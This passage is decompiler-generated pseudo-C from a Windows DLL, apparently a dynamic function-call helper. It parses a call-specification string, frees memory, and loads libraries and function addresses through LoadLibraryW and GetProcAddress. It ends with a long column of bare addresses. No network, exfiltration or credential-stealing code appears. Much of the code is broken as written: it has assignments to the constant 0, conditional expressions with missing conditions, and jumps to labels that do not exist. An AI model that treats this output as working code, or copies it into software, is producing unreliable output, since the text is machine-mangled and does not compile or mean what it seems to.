                                                                            											goto L157;
                                                                            										case 0x19:
                                                                            											__eax = 0;
                                                                            											__eax = 1;
                                                                            											__eflags = 1;
                                                                            											L60:
                                                                            											_push(2);
                                                                            											_pop(__ecx);
                                                                            											_v56 = __ecx;
                                                                            											goto L78;
                                                                            										case 0x1a:
                                                                            											L72:
                                                                            											_push(5);
                                                                            											goto L77;
                                                                            										case 0x1b:
                                                                            											__eax = 0;
                                                                            											__eax = 1;
                                                                            											__eflags = 1;
                                                                            											L63:
                                                                            											_push(3);
                                                                            											_pop(__esi);
                                                                            											_v56 = __esi;
                                                                            											goto L78;
                                                                            										case 0x1c:
                                                                            											__eax = 0;
                                                                            											__eax = 1;
                                                                            											goto L78;
                                                                            										case 0x1d:
                                                                            											L76:
                                                                            											_push(6);
                                                                            											goto L77;
                                                                            										case 0x1e:
                                                                            											L67:
                                                                            											_push(2);
                                                                            											goto L77;
                                                                            										case 0x1f:
                                                                            											__eax =  &_v44;
                                                                            											_t136 = E6F1C1BCF( &_v44) + 1; // 0x1
                                                                            											__esi = _t136;
                                                                            											L83:
                                                                            											__ecx = _v44;
                                                                            											_v60 = _v44;
                                                                            											L95:
                                                                            											__eflags = __esi;
                                                                            											if(__esi == 0) {
                                                                            												goto L157;
                                                                            											}
                                                                            											L104:
                                                                            											__edx = _v48;
                                                                            											0 = 1;
                                                                            											_v24 = 1;
                                                                            											__eflags = __edx;
                                                                            											if(__edx != 0) {
                                                                            												__eflags = __edx - 1;
                                                                            												if(__edx == 1) {
                                                                            													__eax = _v28;
                                                                            													__eax = _v28 << 5;
                                                                            													__eflags = __eax;
                                                                            													 *(__eax + __edi + 0x102c) = __esi;
                                                                            												}
                                                                            												L111:
                                                                            												__edx = __edx + 1;
                                                                            												_v48 = __edx;
                                                                            												goto L157;
                                                                            											}
                                                                            											__ebx = _v28;
                                                                            											__ebx = _v28 << 5;
                                                                            											__eax =  *(__ebx + __edi + 0x1030);
                                                                            											__eflags = __eax - 0xffffffff;
                                                                            											if(__eax <= 0xffffffff) {
                                                                            												L107:
                                                                            												__eax = GlobalFree(__eax);
                                                                            												__edx = _v48;
                                                                            												L108:
                                                                            												 *(__ebx + __edi + 0x1030) = __esi;
                                                                            												goto L111;
                                                                            											}
                                                                            											__eflags = __eax - 0x19;
                                                                            											if(__eax <= 0x19) {
                                                                            												goto L108;
                                                                            											}
                                                                            											goto L107;
                                                                            										case 0x20:
                                                                            											L70:
                                                                            											_v16 = _v16 + 1;
                                                                            											_push(4);
                                                                            											goto L77;
                                                                            										case 0x21:
                                                                            											L74:
                                                                            											_push(4);
                                                                            											L77:
                                                                            											_pop(__eax);
                                                                            											L78:
                                                                            											__ecx =  *(0x6f1c4094 + __eax * 4);
                                                                            											0 = 1;
                                                                            											__esi = __ebx;
                                                                            											__esi = __ebx << 5;
                                                                            											__edx =  ~__edx;
                                                                            											_push(1);
                                                                            											asm("sbb edx, edx");
                                                                            											_v24 = 1;
                                                                            											__edx = __edx & 0x00008000;
                                                                            											__edx = __edx | __eax;
                                                                            											0 = 1;
                                                                            											 *(__esi + __edi + 0x1018) = __edx;
                                                                            											__edx = _v56;
                                                                            											__eflags = __ecx;
                                                                            											__eax =  >  ? __ecx : 1;
                                                                            											__eflags = __edx;
                                                                            											_pop(__ecx);
                                                                            											__eax =  <  ? __ecx :  >  ? __ecx : 1;
                                                                            											 *((intOrPtr*)(__esi + __edi + 0x1028)) =  <  ? __ecx :  >  ? __ecx : 1;
                                                                            											__eflags = __edx - __ecx;
                                                                            											if(__edx == __ecx) {
                                                                            												__eax =  &_v44;
                                                                            												__eax = E6F1C1BCF( &_v44);
                                                                            												__ecx = _v44;
                                                                            												_v60 = _v44;
                                                                            												_t119 = __eax + 1; // 0x1
                                                                            												__edx = _t119;
                                                                            												_v56 = __edx;
                                                                            											}
                                                                            											__ecx = __ebx + 0x81;
                                                                            											 *(__esi + __edi + 0x101c) = __edx;
                                                                            											__ecx = __ebx + 0x81 << 5;
                                                                            											__edx = 0;
                                                                            											 *((intOrPtr*)(__esi + __edi + 0x1030)) = 0;
                                                                            											 *((intOrPtr*)(__esi + __edi + 0x102c)) = 0;
                                                                            											 *((intOrPtr*)((__ebx + 0x81 << 5) + __edi)) = 0;
                                                                            											goto L157;
                                                                            										case 0x22:
                                                                            											goto L157;
                                                                            									}
                                                                            								}
                                                                            								_t352 = _t350 - 1;
                                                                            								__eflags = _t352;
                                                                            								if(_t352 == 0) {
                                                                            									_t321 = 0;
                                                                            									_v28 = 0;
                                                                            									goto L51;
                                                                            								}
                                                                            								__eflags = _t352 != 1;
                                                                            								if(_t352 != 1) {
                                                                            									goto L123;
                                                                            								}
                                                                            								__eflags = _t246 - 0x6e;
                                                                            								if(__eflags > 0) {
                                                                            									_t306 = _t246 - 0x72;
                                                                            									__eflags = _t306;
                                                                            									if(_t306 == 0) {
                                                                            										_push(4);
                                                                            										L43:
                                                                            										_pop(_t307);
                                                                            										L44:
                                                                            										_t354 =  *(_t386 + 0x1010);
                                                                            										__eflags = _v56 - 1;
                                                                            										if(_v56 != 1) {
                                                                            											_t355 = _t354 &  !_t307;
                                                                            											__eflags = _t355;
                                                                            										} else {
                                                                            											_t355 = _t354 | _t307;
                                                                            										}
                                                                            										 *(_t386 + 0x1010) = _t355;
                                                                            										goto L48;
                                                                            									}
                                                                            									_t311 = _t306 - 1;
                                                                            									__eflags = _t311;
                                                                            									if(_t311 == 0) {
                                                                            										_push(0x10);
                                                                            										goto L43;
                                                                            									}
                                                                            									_t356 = 2;
                                                                            									__eflags = _t311 != _t356;
                                                                            									if(_t311 != _t356) {
                                                                            										goto L157;
                                                                            									}
                                                                            									_push(0x40);
                                                                            									goto L43;
                                                                            								}
                                                                            								if(__eflags == 0) {
                                                                            									_push(8);
                                                                            									goto L43;
                                                                            								}
                                                                            								_t313 = _t246 - 0x21;
                                                                            								__eflags = _t313;
                                                                            								if(_t313 == 0) {
                                                                            									_v56 =  ~_v56;
                                                                            									goto L157;
                                                                            								}
                                                                            								_t314 = _t313 - 0x11;
                                                                            								__eflags = _t314;
                                                                            								if(_t314 == 0) {
                                                                            									_t307 = 0x100;
                                                                            									goto L44;
                                                                            								}
                                                                            								_t315 = _t314 - 0x31;
                                                                            								__eflags = _t315;
                                                                            								if(_t315 == 0) {
                                                                            									_t307 = 1;
                                                                            									goto L44;
                                                                            								}
                                                                            								_t357 = 2;
                                                                            								__eflags = _t315 != _t357;
                                                                            								if(_t315 != _t357) {
                                                                            									goto L157;
                                                                            								}
                                                                            								_push(0x20);
                                                                            								goto L43;
                                                                            							}
                                                                            							_v52 = _v52 & 0x00000000;
                                                                            							_t396 = 0;
                                                                            							_v32 = 0;
                                                                            							goto L133;
                                                                            						}
                                                                            						_t358 = _v60;
                                                                            						_t403 = 0x3a;
                                                                            						__eflags =  *((intOrPtr*)(_t358 - 2)) - _t403;
                                                                            						_t344 = _v52;
                                                                            						if( *((intOrPtr*)(_t358 - 2)) != _t403) {
                                                                            							goto L31;
                                                                            						}
                                                                            						__eflags = _t344;
                                                                            						if(_t344 == 0) {
                                                                            							goto L15;
                                                                            						}
                                                                            						goto L31;
                                                                            					}
                                                                            					_t359 = _t343 - 5;
                                                                            					if(_t359 == 0) {
                                                                            						__eflags = _v36;
                                                                            						if(_v36 == 0) {
                                                                            							_v52 = 1;
                                                                            							__eflags = _v32 - 3;
                                                                            							_t370 = (0 | _v32 == 0x00000003) + 1;
                                                                            							__eflags = _t370;
                                                                            							_v28 = _t370;
                                                                            						}
                                                                            						_v56 = _v56 & 0x00000000;
                                                                            						_t405 = _v36;
                                                                            						__eflags = _t405;
                                                                            						_t361 =  ==  ? _v56 : _v56;
                                                                            						_v56 =  ==  ? _v56 : _v56;
                                                                            						_v24 = _v24 & 0x00000000;
                                                                            						__eflags = _t405;
                                                                            						_t363 =  ==  ? _v24 : _v24;
                                                                            						_v24 =  ==  ? _v24 : _v24;
                                                                            						__eflags = _t405;
                                                                            						_t365 = 0 | _t405 == 0x00000000;
                                                                            						_v48 = _v48 & 0x00000000;
                                                                            						__eflags = _v36;
                                                                            						_t407 =  ==  ? _v48 : _v48;
                                                                            						L13:
                                                                            						_v48 = _t407;
                                                                            						__eflags = _t365;
                                                                            						if(_t365 != 0) {
                                                                            							goto L132;
                                                                            						}
                                                                            						L14:
                                                                            						_t344 = _v52;
                                                                            						goto L15;
                                                                            					}
                                                                            					_t371 = _t359 - 1;
                                                                            					if(_t371 == 0) {
                                                                            						_t409 = _v36;
                                                                            						__eflags = _t409;
                                                                            						_t373 =  ==  ? _v4 : _v52;
                                                                            						_v52 =  ==  ? _v4 : _v52;
                                                                            						_v56 = _v56 & 0x00000000;
                                                                            						__eflags = _t409;
                                                                            						_t375 =  ==  ? _v56 : _v56;
                                                                            						_v56 =  ==  ? _v56 : _v56;
                                                                            						__eflags = _t409;
                                                                            						_t365 = 0 | _t409 == 0x00000000;
                                                                            						_v48 = _v48 & 0x00000000;
                                                                            						__eflags = _v36;
                                                                            						_t407 =  ==  ? _v48 : _v48;
                                                                            						goto L13;
                                                                            					}
                                                                            					if(_t371 != 0x16) {
                                                                            						goto L14;
                                                                            					} else {
                                                                            						_v52 = 3;
                                                                            						_v56 = 1;
                                                                            						goto L132;
                                                                            					}
                                                                            				}
                                                                            				GlobalFree(_v8);
                                                                            				GlobalFree(_v40);
                                                                            				GlobalFree(_v20);
                                                                            				if(_t386 == 0 ||  *(_t386 + 0x100c) != 0) {
                                                                            					L185:
                                                                            					return _t386;
                                                                            				} else {
                                                                            					_t256 =  *_t386 - 1;
                                                                            					if(_t256 == 0) {
                                                                            						_t221 = _t386 + 8; // 0x8
                                                                            						_t389 = _t221;
                                                                            						__eflags =  *_t389;
                                                                            						if( *_t389 != 0) {
                                                                            							_t257 = GetModuleHandleW(_t389);
                                                                            							 *(_t386 + 0x1008) = _t257;
                                                                            							__eflags = _t257;
                                                                            							if(_t257 != 0) {
                                                                            								L173:
                                                                            								_t226 = _t386 + 0x808; // 0x808
                                                                            								_t390 = _t226;
                                                                            								_t258 = E6F1C1F7B(_t257, _t390);
                                                                            								 *(_t386 + 0x100c) = _t258;
                                                                            								__eflags = _t258;
                                                                            								if(_t258 == 0) {
                                                                            									_t261 = 0x23;
                                                                            									__eflags =  *_t390 - _t261;
                                                                            									if( *_t390 == _t261) {
                                                                            										_t228 = _t386 + 0x80a; // 0x80a
                                                                            										_t263 = E6F1C135A();
                                                                            										__eflags = _t263;
                                                                            										if(_t263 != 0) {
                                                                            											__eflags = _t263 & 0xffff0000;
                                                                            											if((_t263 & 0xffff0000) == 0) {
                                                                            												 *(_t386 + 0x100c) = GetProcAddress( *(_t386 + 0x1008), _t263 & 0x0000ffff);
                                                                            											}
                                                                            										}
                                                                            									}
                                                                            								}
                                                                            								__eflags = _v16;
                                                                            								if(_v16 != 0) {
                                                                            									L180:
                                                                            									_t390[lstrlenW(_t390)] = 0x57;
                                                                            									_t260 = E6F1C1F7B( *(_t386 + 0x1008), _t390);
                                                                            									__eflags = _t260;
                                                                            									if(_t260 == 0) {
                                                                            										__eflags =  *(_t386 + 0x100c);
                                                                            										L183:
                                                                            										if(__eflags != 0) {
                                                                            											goto L185;
                                                                            										}
                                                                            										L184:
                                                                            										_t240 = _t386 + 4;
                                                                            										 *_t240 =  *(_t386 + 4) | 0xffffffff;
                                                                            										__eflags =  *_t240;
                                                                            										goto L185;
                                                                            									}
                                                                            									L181:
                                                                            									 *(_t386 + 0x100c) = _t260;
                                                                            									goto L185;
                                                                            								} else {
                                                                            									__eflags =  *(_t386 + 0x100c);
                                                                            									if( *(_t386 + 0x100c) != 0) {
                                                                            										goto L185;
                                                                            									}
                                                                            									goto L180;
                                                                            								}
                                                                            							}
                                                                            							_t257 = LoadLibraryW(_t389);
                                                                            							 *(_t386 + 0x1008) = _t257;
                                                                            							__eflags = _t257;
                                                                            							if(_t257 == 0) {
                                                                            								goto L184;
                                                                            							}
                                                                            							goto L173;
                                                                            						}
                                                                            						_t222 = _t386 + 0x808; // 0x808
                                                                            						_t267 = E6F1C135A();
                                                                            						 *(_t386 + 0x100c) = _t267;
                                                                            						__eflags = _t267;
                                                                            						goto L183;
                                                                            					}
                                                                            					_t268 = _t256 - 1;
                                                                            					if(_t268 == 0) {
                                                                            						_t220 = _t386 + 0x808; // 0x808
                                                                            						_t269 = _t220;
                                                                            						__eflags =  *_t269;
                                                                            						if( *_t269 == 0) {
                                                                            							goto L185;
                                                                            						}
                                                                            						_push(_t269);
                                                                            						_t260 = E6F1C135A();
                                                                            						goto L181;
                                                                            					}
                                                                            					if(_t268 != 1) {
                                                                            						goto L185;
                                                                            					}
                                                                            					_t210 = _t386 + 8; // 0x8
                                                                            					_t324 = _t210;
                                                                            					_push(_t210);
                                                                            					_t391 = E6F1C135A();
                                                                            					 *(_t386 + 0x1008) = _t391;
                                                                            					if(_t391 == 0) {
                                                                            						goto L184;
                                                                            					}
                                                                            					 *((intOrPtr*)(_t386 + 0x104c)) = 0;
                                                                            					 *((intOrPtr*)(_t386 + 0x1050)) = E6F1C12E1(_t324);
                                                                            					 *((intOrPtr*)(_t386 + 0x103c)) = 0;
                                                                            					 *((intOrPtr*)(_t386 + 0x1048)) = 1;
                                                                            					 *((intOrPtr*)(_t386 + 0x1038)) = 1;
                                                                            					_t217 = _t386 + 0x808; // 0x808
                                                                            					_t260 =  *(_t391->i + E6F1C135A() * 4);
                                                                            					goto L181;
                                                                            				}
                                                                            			}




























































































                                                                            0x6f1c2359
                                                                            0x6f1c235b
                                                                            0x6f1c2360
                                                                            0x6f1c2364
                                                                            0x6f1c2366
                                                                            0x6f1c236a
                                                                            0x6f1c236e
                                                                            0x6f1c2372
                                                                            0x6f1c2376
                                                                            0x6f1c237a
                                                                            0x6f1c237f
                                                                            0x6f1c2383
                                                                            0x6f1c238a
                                                                            0x6f1c238e
                                                                            0x6f1c2393
                                                                            0x6f1c2395
                                                                            0x6f1c2399
                                                                            0x6f1c239d
                                                                            0x6f1c239f
                                                                            0x6f1c23a3
                                                                            0x6f1c23ab
                                                                            0x6f1c23ab
                                                                            0x6f1c23af
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c23b9
                                                                            0x6f1c23bc
                                                                            0x6f1c23c1
                                                                            0x6f1c23c5
                                                                            0x6f1c23c8
                                                                            0x6f1c2911
                                                                            0x6f1c2911
                                                                            0x6f1c2911
                                                                            0x6f1c2916
                                                                            0x6f1c2916
                                                                            0x6f1c291a
                                                                            0x6f1c291a
                                                                            0x6f1c291d
                                                                            0x6f1c2940
                                                                            0x6f1c2943
                                                                            0x6f1c2945
                                                                            0x6f1c2966
                                                                            0x6f1c2966
                                                                            0x6f1c2947
                                                                            0x6f1c294e
                                                                            0x6f1c2954
                                                                            0x6f1c2956
                                                                            0x6f1c2958
                                                                            0x6f1c295e
                                                                            0x6f1c295e
                                                                            0x6f1c296a
                                                                            0x6f1c2970
                                                                            0x6f1c2970
                                                                            0x6f1c2973
                                                                            0x6f1c2979
                                                                            0x6f1c2979
                                                                            0x6f1c297f
                                                                            0x6f1c2982
                                                                            0x6f1c2987
                                                                            0x6f1c2989
                                                                            0x6f1c298c
                                                                            0x6f1c298c
                                                                            0x6f1c298e
                                                                            0x6f1c29b7
                                                                            0x6f1c29bb
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c29be
                                                                            0x6f1c29c0
                                                                            0x6f1c29c6
                                                                            0x6f1c29cf
                                                                            0x6f1c29d2
                                                                            0x6f1c29d4
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c29d6
                                                                            0x6f1c29d6
                                                                            0x6f1c29d6
                                                                            0x6f1c29dc
                                                                            0x6f1c29de
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c29e0
                                                                            0x6f1c29e2
                                                                            0x6f1c29e2
                                                                            0x6f1c29e6
                                                                            0x6f1c29e8
                                                                            0x6f1c29ea
                                                                            0x6f1c29ea
                                                                            0x6f1c29ea
                                                                            0x6f1c29ea
                                                                            0x6f1c29f1
                                                                            0x6f1c29f7
                                                                            0x6f1c29f9
                                                                            0x6f1c2a0f
                                                                            0x6f1c2a10
                                                                            0x6f1c2a10
                                                                            0x6f1c2a12
                                                                            0x6f1c29fb
                                                                            0x6f1c2a01
                                                                            0x6f1c2a04
                                                                            0x6f1c2a04
                                                                            0x00000000
                                                                            0x6f1c2990
                                                                            0x6f1c2990
                                                                            0x6f1c2990
                                                                            0x6f1c2993
                                                                            0x6f1c299f
                                                                            0x6f1c29a4
                                                                            0x6f1c29aa
                                                                            0x6f1c29aa
                                                                            0x6f1c29ae
                                                                            0x6f1c29af
                                                                            0x6f1c29af
                                                                            0x6f1c2a18
                                                                            0x6f1c2a18
                                                                            0x6f1c2a1c
                                                                            0x6f1c2a1c
                                                                            0x6f1c2a20
                                                                            0x6f1c2a20
                                                                            0x6f1c2a24
                                                                            0x6f1c2a27
                                                                            0x6f1c2a2b
                                                                            0x6f1c2a2d
                                                                            0x6f1c2a34
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c2a34
                                                                            0x6f1c2995
                                                                            0x6f1c2995
                                                                            0x6f1c2998
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c299a
                                                                            0x6f1c299d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c299d
                                                                            0x6f1c298e
                                                                            0x6f1c291f
                                                                            0x6f1c2922
                                                                            0x6f1c2928
                                                                            0x6f1c2930
                                                                            0x6f1c2932
                                                                            0x6f1c2932
                                                                            0x6f1c2933
                                                                            0x6f1c2933
                                                                            0x00000000
                                                                            0x6f1c2922
                                                                            0x6f1c23ce
                                                                            0x6f1c23d1
                                                                            0x6f1c2502
                                                                            0x6f1c2506
                                                                            0x6f1c2522
                                                                            0x6f1c2526
                                                                            0x6f1c2526
                                                                            0x6f1c252b
                                                                            0x6f1c24b8
                                                                            0x6f1c24ba
                                                                            0x6f1c24ba
                                                                            0x6f1c24bc
                                                                            0x6f1c2852
                                                                            0x6f1c2870
                                                                            0x6f1c2870
                                                                            0x6f1c2873
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c2858
                                                                            0x6f1c285b
                                                                            0x6f1c2860
                                                                            0x6f1c2864
                                                                            0x6f1c2866
                                                                            0x6f1c28a9
                                                                            0x6f1c28aa
                                                                            0x6f1c28ae
                                                                            0x6f1c28ae
                                                                            0x6f1c28b7
                                                                            0x6f1c28ba
                                                                            0x6f1c28bb
                                                                            0x00000000
                                                                            0x6f1c28bb
                                                                            0x6f1c2868
                                                                            0x6f1c2868
                                                                            0x6f1c2868
                                                                            0x6f1c286d
                                                                            0x6f1c286d
                                                                            0x6f1c2875
                                                                            0x6f1c2878
                                                                            0x6f1c2907
                                                                            0x6f1c2908
                                                                            0x00000000
                                                                            0x6f1c2908
                                                                            0x6f1c2880
                                                                            0x6f1c2881
                                                                            0x6f1c2883
                                                                            0x6f1c288c
                                                                            0x6f1c288c
                                                                            0x6f1c288f
                                                                            0x6f1c2892
                                                                            0x6f1c28c2
                                                                            0x6f1c28c2
                                                                            0x6f1c28c7
                                                                            0x6f1c28c8
                                                                            0x6f1c28cb
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c28cd
                                                                            0x6f1c28d0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c28d4
                                                                            0x6f1c28d5
                                                                            0x6f1c28d9
                                                                            0x6f1c28d9
                                                                            0x6f1c28db
                                                                            0x6f1c28df
                                                                            0x6f1c28e3
                                                                            0x6f1c28fd
                                                                            0x00000000
                                                                            0x6f1c28fd
                                                                            0x6f1c28e5
                                                                            0x6f1c28eb
                                                                            0x6f1c28ef
                                                                            0x00000000
                                                                            0x6f1c28ef
                                                                            0x6f1c2894
                                                                            0x6f1c2897
                                                                            0x6f1c289b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c289d
                                                                            0x00000000
                                                                            0x6f1c289d
                                                                            0x6f1c2887
                                                                            0x6f1c2888
                                                                            0x6f1c288a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c288a
                                                                            0x6f1c24c2
                                                                            0x6f1c24c2
                                                                            0x6f1c24c5
                                                                            0x6f1c25a7
                                                                            0x6f1c25ab
                                                                            0x6f1c25ab
                                                                            0x6f1c25ae
                                                                            0x6f1c25b1
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c25b7
                                                                            0x6f1c25be
                                                                            0x00000000
                                                                            0x6f1c278d
                                                                            0x6f1c2791
                                                                            0x6f1c2795
                                                                            0x6f1c2797
                                                                            0x6f1c279a
                                                                            0x6f1c279b
                                                                            0x6f1c279b
                                                                            0x6f1c279e
                                                                            0x6f1c27a1
                                                                            0x6f1c27a4
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c27a6
                                                                            0x6f1c27a6
                                                                            0x6f1c27aa
                                                                            0x6f1c27c3
                                                                            0x6f1c27c3
                                                                            0x6f1c27c7
                                                                            0x6f1c27c7
                                                                            0x6f1c27ca
                                                                            0x6f1c27ce
                                                                            0x6f1c27d7
                                                                            0x00000000
                                                                            0x6f1c27d7
                                                                            0x6f1c27ac
                                                                            0x6f1c27ac
                                                                            0x6f1c27af
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c27b1
                                                                            0x6f1c27b4
                                                                            0x6f1c27b6
                                                                            0x6f1c27b6
                                                                            0x6f1c27b6
                                                                            0x6f1c27b9
                                                                            0x6f1c27bc
                                                                            0x6f1c27bf
                                                                            0x6f1c279b
                                                                            0x6f1c279e
                                                                            0x6f1c27a1
                                                                            0x6f1c27a4
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c27a4
                                                                            0x00000000
                                                                            0x6f1c2593
                                                                            0x6f1c2596
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c2618
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c25ff
                                                                            0x6f1c2603
                                                                            0x6f1c2605
                                                                            0x6f1c2609
                                                                            0x6f1c260a
                                                                            0x6f1c260b
                                                                            0x6f1c260f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c2757
                                                                            0x6f1c275b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c2761
                                                                            0x6f1c2765
                                                                            0x6f1c2767
                                                                            0x6f1c2768
                                                                            0x6f1c276a
                                                                            0x6f1c2773
                                                                            0x6f1c2775
                                                                            0x6f1c2779
                                                                            0x6f1c277b
                                                                            0x6f1c2781
                                                                            0x6f1c2782
                                                                            0x6f1c2783
                                                                            0x6f1c2788
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c2716
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c2622
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c27f8
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c262a
                                                                            0x6f1c262c
                                                                            0x6f1c262d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c27e8
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c27ec
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c27f4
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c2676
                                                                            0x6f1c2676
                                                                            0x6f1c2678
                                                                            0x6f1c2678
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c263d
                                                                            0x6f1c263f
                                                                            0x6f1c2640
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c2650
                                                                            0x6f1c2652
                                                                            0x6f1c2653
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c2688
                                                                            0x6f1c2688
                                                                            0x6f1c268a
                                                                            0x6f1c268a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c265c
                                                                            0x6f1c265c
                                                                            0x6f1c265e
                                                                            0x6f1c265e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c2665
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c27f0
                                                                            0x6f1c27fa
                                                                            0x6f1c27fa
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c271f
                                                                            0x6f1c2724
                                                                            0x6f1c272a
                                                                            0x6f1c272c
                                                                            0x6f1c272d
                                                                            0x6f1c272d
                                                                            0x6f1c2730
                                                                            0x6f1c2732
                                                                            0x6f1c2734
                                                                            0x6f1c2735
                                                                            0x6f1c2738
                                                                            0x6f1c2738
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c27e3
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c2669
                                                                            0x6f1c2669
                                                                            0x6f1c266b
                                                                            0x6f1c266b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c2626
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c267f
                                                                            0x6f1c267f
                                                                            0x6f1c2681
                                                                            0x6f1c2681
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c25c5
                                                                            0x6f1c25d1
                                                                            0x6f1c25d3
                                                                            0x6f1c25d5
                                                                            0x6f1c25d8
                                                                            0x6f1c25dc
                                                                            0x6f1c25e0
                                                                            0x6f1c25e4
                                                                            0x6f1c25f0
                                                                            0x6f1c25f2
                                                                            0x6f1c25f3
                                                                            0x6f1c25f6
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c2631
                                                                            0x6f1c2633
                                                                            0x6f1c2633
                                                                            0x6f1c2634
                                                                            0x6f1c2634
                                                                            0x6f1c2636
                                                                            0x6f1c2637
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c267b
                                                                            0x6f1c267b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c2644
                                                                            0x6f1c2646
                                                                            0x6f1c2646
                                                                            0x6f1c2647
                                                                            0x6f1c2647
                                                                            0x6f1c2649
                                                                            0x6f1c264a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c2657
                                                                            0x6f1c2659
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c268d
                                                                            0x6f1c268d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c2661
                                                                            0x6f1c2661
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c2747
                                                                            0x6f1c2752
                                                                            0x6f1c2752
                                                                            0x6f1c273a
                                                                            0x6f1c273a
                                                                            0x6f1c273e
                                                                            0x6f1c27d9
                                                                            0x6f1c27d9
                                                                            0x6f1c27db
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c27fb
                                                                            0x6f1c27fb
                                                                            0x6f1c2801
                                                                            0x6f1c2802
                                                                            0x6f1c2806
                                                                            0x6f1c2808
                                                                            0x6f1c2836
                                                                            0x6f1c2838
                                                                            0x6f1c283a
                                                                            0x6f1c283e
                                                                            0x6f1c283e
                                                                            0x6f1c2841
                                                                            0x6f1c2841
                                                                            0x6f1c2848
                                                                            0x6f1c2848
                                                                            0x6f1c2849
                                                                            0x00000000
                                                                            0x6f1c2849
                                                                            0x6f1c280a
                                                                            0x6f1c280e
                                                                            0x6f1c2811
                                                                            0x6f1c2818
                                                                            0x6f1c281b
                                                                            0x6f1c2822
                                                                            0x6f1c2823
                                                                            0x6f1c2829
                                                                            0x6f1c282d
                                                                            0x6f1c282d
                                                                            0x00000000
                                                                            0x6f1c282d
                                                                            0x6f1c281d
                                                                            0x6f1c2820
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c266e
                                                                            0x6f1c266e
                                                                            0x6f1c2672
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c2684
                                                                            0x6f1c2684
                                                                            0x6f1c268f
                                                                            0x6f1c268f
                                                                            0x6f1c2690
                                                                            0x6f1c2690
                                                                            0x6f1c2699
                                                                            0x6f1c269a
                                                                            0x6f1c269c
                                                                            0x6f1c269f
                                                                            0x6f1c26a1
                                                                            0x6f1c26a2
                                                                            0x6f1c26a4
                                                                            0x6f1c26a8
                                                                            0x6f1c26ae
                                                                            0x6f1c26b2
                                                                            0x6f1c26b3
                                                                            0x6f1c26ba
                                                                            0x6f1c26be
                                                                            0x6f1c26c0
                                                                            0x6f1c26c3
                                                                            0x6f1c26c5
                                                                            0x6f1c26c6
                                                                            0x6f1c26c9
                                                                            0x6f1c26d0
                                                                            0x6f1c26d2
                                                                            0x6f1c26d4
                                                                            0x6f1c26d9
                                                                            0x6f1c26df
                                                                            0x6f1c26e3
                                                                            0x6f1c26e7
                                                                            0x6f1c26e7
                                                                            0x6f1c26ea
                                                                            0x6f1c26ea
                                                                            0x6f1c26ee
                                                                            0x6f1c26f4
                                                                            0x6f1c26fb
                                                                            0x6f1c26fe
                                                                            0x6f1c2700
                                                                            0x6f1c2707
                                                                            0x6f1c270e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c25be
                                                                            0x6f1c24cb
                                                                            0x6f1c24cb
                                                                            0x6f1c24ce
                                                                            0x6f1c259f
                                                                            0x6f1c25a1
                                                                            0x00000000
                                                                            0x6f1c25a1
                                                                            0x6f1c24d4
                                                                            0x6f1c24d7
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c24dd
                                                                            0x6f1c24e0
                                                                            0x6f1c2556
                                                                            0x6f1c2556
                                                                            0x6f1c2559
                                                                            0x6f1c2573
                                                                            0x6f1c2575
                                                                            0x6f1c2575
                                                                            0x6f1c2576
                                                                            0x6f1c2576
                                                                            0x6f1c257f
                                                                            0x6f1c2583
                                                                            0x6f1c258b
